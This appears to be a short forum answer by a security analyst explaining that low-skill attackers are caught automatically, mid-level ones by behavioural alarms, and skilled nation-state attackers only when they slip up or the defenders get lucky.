How easy is it to catch hackers?
By-farhan Mazid
Originally Answered: How difficult is it to catch computer hackers?
My job is catching hackers. The better the hacker, the harder it is to catch them.
We automatically catch and repel script kiddie attacks using known, simple tools. Any commercial off the shelf solution will do it, and any half competent security engineer could write one himself in an afternoon, given access to suitable data.
Lower skill attackers trip the alarms we set to look for the kind of things that attackers do and users don't. Users in the sales department generally don't execute base64 encoded PowerShell against production servers. It takes a good team to set up the right alarms that catch a real attack but don't trigger too often when no attack happened. Catching this level of attacker is very feasible, but not cheap. These attackers tend to be commercially motivated, looking to steal credit cards, passwords and other monetizable data.
The most skilled nation-state attackers (i.e. intelligence agencies) know what kinds of alarms we set and specifically avoid them. Often they have external intelligence about their targets that lets them know exactly how to hide their tracks and where to find the data they're trying to steal. They may conduct an initial, disposable penetration just for recon and then a second one to achieve their goals. They may use 0 day exploits unknown to anyone else. In the industry, we only catch these attackers if they screw up or we get lucky.
Of course some companies are better at detection than others…